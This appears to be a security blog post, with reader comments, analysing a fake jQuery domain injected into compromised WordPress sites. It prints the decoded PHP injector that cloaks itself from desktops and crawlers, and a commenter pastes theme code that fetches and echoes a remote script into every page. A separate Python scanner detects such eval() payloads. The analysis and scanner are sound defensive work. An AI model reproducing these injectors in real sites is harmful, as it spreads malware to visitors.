Careful With Fake jQuery Website – jquery-framework.com

jquery-framework.com

A few days ago we posted in our Labs notes about a fake jQuery website that is distributing malware. The domain was carefully chosen to confuse end users (jquery-framework.com), since it looks like a legitimate site.

This is what we were seeing injected on some websites:

<script src="httx://jquery-framework.com/jquery-1.7.1.js..

Some people have even complained to us that we’re flagging jQuery by mistake. However, when you visit that page you see that it does not have the jQuery code, just a redirection to http://browser-31.com/:

window.location = "httx://browser-31.com/s/3013";

Which then redirects the browser to additional malicious domains. This is the full path:

http://browser-31.com/s/3013 -> http://browser-31.com/ -> http://exmobi.org/ ->
http://exmobi.org//?TCFL7295a460c02994eeff6c4089e21d24c4=0064f9c1307b53e92d675b76009102e1

or

http://browser-31.com/s/3013 -> http://4redirect.me/in.cgi?5 -> http://sys-traf.ru/?i=5622 -> 
http://moby-c.ru/?r=10997 -> http://wap-trafik.ru/tb.php

Compromised WordPress sites

Since we first saw this and posted about it in our Labs, we have seen even more websites compromised with it (mostly outdated WordPress installs). We had the chance to analyze some of them, and they used the following eval code to hide the malware inside the theme files:

eval("\145\166\141\154\50\142 .. \141\163\145\66\64\137")

Which when decoded executes the following:

// The injector runs only for visitors that look mobile: a WAP Accept header, a mobile
// User-Agent, or a mobile-search Referer, and never for desktop browsers or crawlers.
if ((preg_match("/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si", @$_SERVER['HTTP_ACCEPT']) ||
     preg_match('/alcatel|amoi|android|avantgo|blackberry|..'
              . '|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola'
              . '|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|'
              . 'vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) ||
     preg_match('/msearch|m?q=/si', @$_SERVER['HTTP_REFERER'])) &&
    !preg_match('/macintosh|america|avant|download|windows-media-player|yandex|google/si',
                @$_SERVER['HTTP_USER_AGENT'])) {
    // Only then is the fake jQuery loader echoed into the page and the request cut short
    echo '<script src="httx://jquery-framework.com/jquery-1.7.1.js"..';
    flush();
    exit;
}

If you are not familiar with PHP: the code checks whether the visitor looks like a mobile device (an iPod, iPad, iPhone, Android phone, etc., judged from the Accept header, the User-Agent string and the Referer), skips desktop browsers and crawlers such as Google and Yandex, and only then inserts the jquery-framework.com script into the page. A desktop visitor, or a scanner that does not send a mobile User-Agent, sees a clean site. Since Google (and other AV blacklists) aren’t flagging this domain, users receive no warning of what is happening.
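As an added example (not part of the original post or Sucuri's tooling), here is a small Python scanner that does what the analysis above did by hand: it finds eval() calls whose string literal is built from octal or hex escapes, decodes them, and reports whether the decoded code references the hosts named in this post. The sample theme file is constructed inline; the indicator list and the "mostly escapes" threshold are this example's own choices.

```python
import re

# Hosts named in the post; their presence in decoded code is a strong indicator.
INDICATORS = ("jquery-framework.com", "browser-31.com", "jqueryc.com")

# Octal (\145), hex (\x65) and simple (\n, \", \\) escapes of a PHP double-quoted string.
_ESCAPE = re.compile(r'\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})|\\(.)', re.S)

# eval("...") with a double-quoted literal; DOTALL so a literal wrapped over lines still matches.
_EVAL = re.compile(r'eval\s*\(\s*"((?:\\.|[^"\\])*)"\s*\)', re.S)


def decode_php_string(body):
    """Decode the escapes in the body of a PHP double-quoted string (ASCII payloads)."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 8) & 0xFF)
        if m.group(2) is not None:
            return chr(int(m.group(2), 16))
        return {"n": "\n", "t": "\t", "r": "\r"}.get(m.group(3), m.group(3))
    return _ESCAPE.sub(repl, body)


def scan_php_source(source):
    """Return a finding for each eval() whose literal is mostly escape sequences."""
    findings = []
    for m in _EVAL.finditer(source):
        body = m.group(1)
        n_escapes = len(_ESCAPE.findall(body))
        decoded = decode_php_string(body)
        # Heuristic (this example's choice): readable code has few escapes, hidden code is all escapes.
        if n_escapes < 8 or n_escapes * 2 < len(decoded):
            continue
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "decoded": decoded,
            "indicators": [h for h in INDICATORS if h in decoded],
        })
    return findings


def to_octal_escapes(text):
    """Used only to build the constructed sample: encode every byte as \\ooo."""
    return "".join("\\%o" % b for b in text.encode())


# Constructed sample theme file: the injector hidden the way the post's eval() line is.
HIDDEN = 'echo \'<script src="httx://jquery-framework.com/jquery-1.7.1.js"></script>\';'
SAMPLE_PHP = ("<?php\n/* Define our theme URL constant */\n"
              'eval("' + to_octal_escapes(HIDDEN) + '");\n'
              "define('WP_THEME_URL', get_template_directory_uri());\n")
```

Run `scan_php_source()` over each theme file, the root index.php and anything else recently modified; a finding with an empty indicator list is still worth reading, since the decoded text is shown.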

We’re definitely flagging it; make sure to scan your site for free using Sucuri SiteCheck to confirm you’re good to go.

13 comments
  1. Have you seen this on any WordPress.com sites? They’re supposed to be invulnerable to this sort of thing but I’ve seen at least one this past week that displays bizarre signs of a classic hack.

1. This is definitely happening on wordpress sites. I’ve been working to clean some this last week. It’s a much more complex hack than this post details. The mobile redirect is only part of it. Somehow they found a way in through an outdated wordpress install or plugin & have set up a hidden root user on our server. If you see this on any of your servers make sure to address it as quick as possible.

1. If you, or anyone, has any words of wisdom on how to handle this, I’d love to hear it. I’m totally lost and meanwhile people think the russians are after us.

        1. We have just recovered one of our servers from this. An outdated wordpress install seemed to have been the access point, though we are still investigating some more.

Some random files were created in the folder of each domain, while the redirection on mobile devices was caused by a modified “.htaccess” file.

1. Thanks! There was a bunch of junk in the .htaccess file of the root folder so I deleted it, but the site still redirects on mobile devices. The only difference is that it redirects immediately to “browser-31” without going to “jquery-framework” first. I’m checking all the files modified around the time when the site went down, but I’m not sure what I should be looking for.

Edit: fixed it like 5 minutes later. So as Daniel said, the .php files in the “themes” folder were affected, as you said, the .htaccess file in the root was affected, and I found the last bit in the index.php of the root folder, which looked like the eval code described above. Hope this helps anyone else out.

      2. That is not what I asked. WordPress.COM is different from WordPress.ORG and has some severe code restrictions specifically to prevent this kind of attack. Has it been seen on WordPress.com sites?

        1. Hey there. We have not seen this on WordPress.com sites. That’s a different animal, and they do a pretty good job of reducing risk around these type of issues.

  2. I’ve just fixed one of our WordPress servers with this same error although I’m not sure what caused it in the first place so it might strike again.

    To fix this I had to remove the eval code for all php files in the themes folder (>50 files in my case). Also I had to remove the eval code from index.php in the root directory as well as remove the extra lines added to .htaccess.

3. I had the same issue as described and I did a simple search in theme functions to find keyword “jquery”.

    Go to:
    Appearance > Editor> Theme Functions (right sidebar)

    If working on a mac hit Command+F to search keywords

    Type in “Jquery”.

    This is what i found:

/* Define our theme URL constant */

if (!function_exists('insert_jquery_theme')) {
    function insert_jquery_theme() {
        if (function_exists('curl_init')) {
            // fetches the remote "jquery" file and echoes it into every page head
            $url = "http://www.jqueryc.com/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5;
            curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $data = curl_exec($ch); curl_close($ch); echo $data;
        }
    }
    add_action('wp_head', 'insert_jquery_theme');
}
if (!defined('WP_THEME_URL')) { define('WP_THEME_URL', get_template_directory_uri()); }

    I just deleted it and problem solved… for now.

    Hope this helps.
